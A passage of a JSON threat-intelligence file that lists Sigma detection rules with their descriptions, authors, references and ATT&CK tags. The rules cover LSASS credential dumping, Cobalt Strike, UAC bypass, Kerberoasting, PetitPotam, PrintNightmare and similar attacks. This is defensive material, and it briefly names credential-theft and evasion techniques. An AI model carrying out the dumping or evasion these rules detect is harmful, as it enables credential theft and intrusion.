"author": "Tim Burrell", "creation_date": "2020-01-02", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_svchost_susp_access_request.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://github.com/hlldz/Invoke-Phant0m", "https://twitter.com/timbmsft/status/900724491076214784", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_svchost_susp_access_request.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", "value": "Suspicious Svchost Process Access" }, { "description": "Detects the process injection of a LittleCorporal generated Maldoc.", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-09", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_hktl_littlecorporal_generated_maldoc.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://github.com/connormcgarr/LittleCorporal", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_littlecorporal_generated_maldoc.yml" ], "tags": [ "attack.execution", "attack.t1204.002", "attack.t1055.003" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "41d9846c-f6af-4302-a654-24bba2729bc6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", "value": "HackTool - LittleCorporal Generated Maldoc Injection" }, { "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", "meta": { 
"author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_uac_bypass_wow64_logger.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", "value": "UAC Bypass Using WOW64 Logger DLL Hijack" }, { "description": "Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.", "meta": { "author": "Patryk Prauze - ING Tech", "creation_date": "2019-05-20", "falsepositive": [ "Unlikely" ], "filename": "proc_access_win_lsass_remote_access_trough_winrm.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/2018/05/15/lateral-movement-winrm/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_remote_access_trough_winrm.yml" ], "tags": [ "attack.credential-access", "attack.execution", "attack.t1003.001", "attack.t1059.001", "attack.lateral-movement", "attack.t1021.006", "attack.s0002" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aa35a627-33fb-4d04-a165-d33b4afca3e8", "value": "Remote LSASS Process Access Through Windows Remote Management" }, { "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-10-20", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", "https://twitter.com/shantanukhande/status/1229348874298388484", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a49fa4d5-11db-418c-8473-1e014a8dd462", "value": "Lsass Memory Dump via Comsvcs DLL" }, { "description": "Detects when a process tries to access the memory of svchost to potentially dump credentials.", "meta": { "author": "Florent Labouyrie", "creation_date": "2021-04-30", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_svchost_credential_dumping.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_svchost_credential_dumping.yml" ], "tags": [ "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], 
"uuid": "174afcfa-6e40-4ae9-af64-496546389294", "value": "Credential Dumping Attempt Via Svchost" }, { "description": "Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-10", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_lsass_whitelisted_process_names.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1460597833917251595", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", "https://twitter.com/_xpn_/status/1491557187168178176", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_whitelisted_process_names.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.s0002" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4be8b654-0c01-4c9d-a10c-6b28467fc651", "value": "LSASS Access From Potentially White-Listed Processes" }, { "description": "Detects process access requests to LSASS process with potentially suspicious access flags", "meta": { "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", "creation_date": "2021-11-22", "falsepositive": [ "Legitimate software such as AV and EDR" ], "filename": "proc_access_win_lsass_susp_access_flag.yml", "level": "medium", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", 
"https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_susp_access_flag.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.s0002" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a18dd26b-6450-46de-8c91-9659150cf088", "value": "Potentially Suspicious GrantedAccess Flags On LSASS" }, { "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-04", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://github.com/boku7/spawn", "https://github.com/boku7/injectAmsiBypass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml" ], "tags": [ "attack.execution", "attack.t1106", "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "09706624-b7f6-455d-9d02-adee024cee1d", "value": "HackTool - CobaltStrike BOF Injection Pattern" }, { "description": "This detection excludes known named pipes accessible remotely and notifies on newly observed ones, which may help to detect lateral movement and remote execution using named pipes", "meta": { "author": "Samir Bousseaden, @neu5ron, Tim Shelton", "creation_date": "2020-04-02", "falsepositive": [ "Update the excluded named pipe to filter out any newly observed legit named pipe" ], "filename": "zeek_smb_converted_win_lm_namedpipe.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://twitter.com/menasec1/status/1104489274387451904", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "021310d9-30a6-480a-84b7-eaa69aeb92bb", "value": "First Time Seen Remote Named Pipe - Zeek" }, { "description": "Detects Kerberos TGS requests using RC4 encryption, which may be indicative of Kerberoasting", "meta": { "author": "sigma", "creation_date": "2020-02-12", "falsepositive": [ "Normal enterprise SPN requests activity" ], "filename": "zeek_susp_kerberos_rc4.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://adsecurity.org/?p=3458", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_susp_kerberos_rc4.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], 
"uuid": "503fe26e-b5f2-4944-a126-eab405cc06e5", "value": "Kerberos Network Traffic RC4 Ticket Encryption" }, { "description": "Detects connections from routable IPs to an RDP listener. Which is indicative of a publicly-accessible RDP service.\n", "meta": { "author": "Josh Brower @DefensiveDepth", "creation_date": "2020-08-22", "falsepositive": [ "Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet." ], "filename": "zeek_rdp_public_listener.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://attack.mitre.org/techniques/T1021/001/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_rdp_public_listener.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.001" ] }, "related": [ { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1fc0809e-06bf-4de3-ad52-25e5263b7623", "value": "Publicly Accessible RDP Service" }, { "description": "Detects the presence of default Cobalt Strike certificate in the HTTPS traffic", "meta": { "author": "Bhabesh Raj", "creation_date": "2021-06-23", "falsepositive": [ "Unknown" ], "filename": "zeek_default_cobalt_strike_certificate.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml" ], "tags": [ "attack.command-and-control", "attack.s0154" ] }, "uuid": 
"7100f7e3-92ce-4584-b7b7-01b40d3d4118", "value": "Default Cobalt Strike Certificate" }, { "description": "A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "Unknown" ], "filename": "zeek_http_webdav_put_request.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29/issues/17", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_webdav_put_request.yml" ], "tags": [ "attack.exfiltration", "attack.t1048.003" ] }, "related": [ { "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "705072a5-bb6f-4ced-95b6-ecfa6602090b", "value": "WebDav Put Request" }, { "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", "meta": { "author": "@neu5ron, Teymur Kheirkhabarov, oscd.community", "creation_date": "2020-04-02", "falsepositive": [ "Transferring sensitive files for legitimate administration work by legitimate administrator" ], "filename": "zeek_smb_converted_win_transferring_files_with_credential_data.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002", "attack.t1003.001", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2e69f167-47b5-4ae7-a390-47764529eff5", "value": "Transferring Files with Credential Data via Network Shares - Zeek" }, { "description": "Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/", "meta": { "author": "SOC Prime, Adam Swan", "creation_date": "2020-05-01", "falsepositive": [ "Unknown" ], "filename": "zeek_http_executable_download_from_webdav.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29", "http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_executable_download_from_webdav.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aac2fd97-bcba-491b-ad66-a6edf89c71bf", "value": "Executable from Webdav" }, { "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", "meta": { "author": "Samir Bousseaden, @neu5ron, Tim Shelton", "creation_date": "2020-04-02", "falsepositive": [ "Unknown" ], "filename": "zeek_smb_converted_win_susp_psexec.yml", "level": "high", 
"logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f1b3a22a-45e6-4004-afb5-4291f9c21166", "value": "Suspicious PsExec Execution - Zeek" }, { "description": "Detects usage of the Windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack referred to as PetitPotam.\nThe usage of this RPC function should be rare if ever used at all.\nThus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.\n View surrounding logs (within a few minutes before and after) from the Source IP. Logs from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc.\n", "meta": { "author": "@neu5ron, @Antonlovesdnb, Mike Remen", "creation_date": "2021-08-17", "falsepositive": [ "Uncommon but legitimate Windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description)." 
], "filename": "zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", "https://threatpost.com/microsoft-petitpotam-poc/168163/", "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" ], "tags": [ "attack.t1557.001", "attack.t1187" ] }, "related": [ { "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b77cf5f3-6060-475d-bd60-40ccbf28fdc2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4096842a-8f9f-4d36-92b4-d0b2a62f9b2a", "value": "Potential PetitPotam Attack Via EFS RPC Calls" }, { "description": "NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. 
This rule looks for a DNS request to the ma>", "meta": { "author": "Michael Portera (@mportatoes)", "creation_date": "2022-04-21", "falsepositive": [ "Unknown" ], "filename": "zeek_dns_nkn.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://github.com/Maka8ka/NGLite", "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", "https://github.com/nknorg/nkn-sdk-go", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" ], "tags": [ "attack.command-and-control" ] }, "uuid": "fa7703d6-0ee8-4949-889c-48c84bc15b6f", "value": "New Kind of Network (NKN) Detection" }, { "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", "meta": { "author": "Samir Bousseaden, @neu5rn", "creation_date": "2020-04-03", "falsepositive": [ "Unknown" ], "filename": "zeek_smb_converted_win_atsvc_task.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml" ], "tags": [ "attack.lateral-movement", "attack.persistence", "car.2013-05-004", "car.2015-04-001", "attack.t1053.002" ] }, "related": [ { "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dde85b37-40cd-4a94-b00c-0b8794f956b5", "value": "Remote Task Creation via ATSVC Named Pipe - Zeek" }, { "description": "Identifies IPs performing DNS lookups associated with common Tor proxies.", "meta": { "author": "Saw Winn Naung , Azure-Sentinel", "creation_date": "2021-08-15", "falsepositive": [ "Unknown" ], "filename": "zeek_dns_torproxy.yml", "level": "medium", "logsource.category": "No established 
category", "logsource.product": "zeek", "refs": [ "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_torproxy.yml" ], "tags": [ "attack.exfiltration", "attack.t1048" ] }, "related": [ { "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a8322756-015c-42e7-afb1-436e85ed3ff5", "value": "DNS TOR Proxies" }, { "description": "Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.", "meta": { "author": "@neu5ron, SOC Prime", "creation_date": "2020-03-19", "falsepositive": [ "Windows administrator tasks or troubleshooting", "Windows management scripts or software" ], "filename": "zeek_dce_rpc_mitre_bzar_persistence.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://github.com/mitre-attack/bzar#indicators-for-attck-persistence", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml" ], "tags": [ "attack.persistence", "attack.t1547.004" ] }, "related": [ { "dest-uuid": "6836813e-8ec8-4375-b459-abb388cb1a35", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53389db6-ba46-48e3-a94c-e0f2cefe1583", "value": "MITRE BZAR Indicators for Persistence" }, { "description": "Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request.\nVerify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP).\nWithin the client body is where the code execution would occur. 
Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.\n", "meta": { "author": "Nate Guagenti (neu5ron)", "creation_date": "2021-09-20", "falsepositive": [ "Exploits that were attempted but unsuccessful.", "Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips." ], "filename": "zeek_http_omigod_no_auth_rce.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://twitter.com/neu5ron/status/1438987292971053057?s=20", "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml" ], "tags": [ "attack.privilege-escalation", "attack.initial-access", "attack.execution", "attack.lateral-movement", "attack.t1068", "attack.t1190", "attack.t1203", "attack.t1021.006", "attack.t1210" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"ab6b1a39-a9ee-4ab4-b075-e83acf6e346b", "value": "OMIGOD HTTP No Authentication RCE" }, { "description": "Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml", "meta": { "author": "Samir Bousseaden, @neu5ron", "creation_date": "2020-03-19", "falsepositive": [ "Unknown" ], "filename": "zeek_smb_converted_win_impacket_secretdump.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002", "attack.t1003.004", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "92dae1ed-1c9d-4eff-a567-33acbd95b00e", "value": "Possible Impacket SecretDump Remote Activity - Zeek" }, { "description": "Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675).\nThe occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.\n", "meta": { "author": "@neu5ron (Nate Guagenti)", "creation_date": "2021-08-23", "falsepositive": [ "Legitimate remote alteration of a printer driver." 
], "filename": "zeek_dce_rpc_printnightmare_print_driver_install.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", "https://github.com/corelight/CVE-2021-1675", "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" ], "tags": [ "attack.execution", "cve.2021-1678", "cve.2021-1675", "cve.2021-34527" ] }, "uuid": "7b33baef-2a75-4ca3-9da4-34f9a15382d8", "value": "Possible PrintNightmare Print Driver Install" }, { "description": "The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused).\nAlthough recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.\nOtherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.\nDetermine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.\nThis Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'\n", "meta": { "author": "@neu5ron, SOC Prime Team, Corelight", "creation_date": "2021-05-04", "falsepositive": [ "Internal or legitimate external domains using DNSSec. 
Verify if these are legitimate DNSSec domains and then exclude them.", "If you work in a Public Sector then it may be good to exclude things like endswith \".edu\", \".gov\" and or \".mil\"" ], "filename": "zeek_dns_susp_zbit_flag.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://tools.ietf.org/html/rfc2929#section-2.1", "https://twitter.com/neu5ron/status/1346245602502443009", "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml" ], "tags": [ "attack.t1095", "attack.t1571", "attack.command-and-control" ] }, "related": [ { "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b18eae87-b469-4e14-b454-b171b416bc18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ede05abc-2c9e-4624-9944-9ff17fdc0bf5", "value": "Suspicious DNS Z Flag Bit Set" }, { "description": "Detects known sensitive file extensions via Zeek", "meta": { "author": "Samir Bousseaden, @neu5ron", "creation_date": "2020-04-02", "falsepositive": [ "Help Desk operator doing backup or re-imaging end user machine or backup software", "Users working with these data types or exchanging message files" ], "filename": "zeek_smb_converted_win_susp_raccess_sensitive_fext.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml" ], "tags": [ "attack.collection" ] }, "uuid": "286b47ed-f6fe-40b3-b3a8-35129acd43bc", "value": "Suspicious Access to Sensitive File Extensions - Zeek" }, 
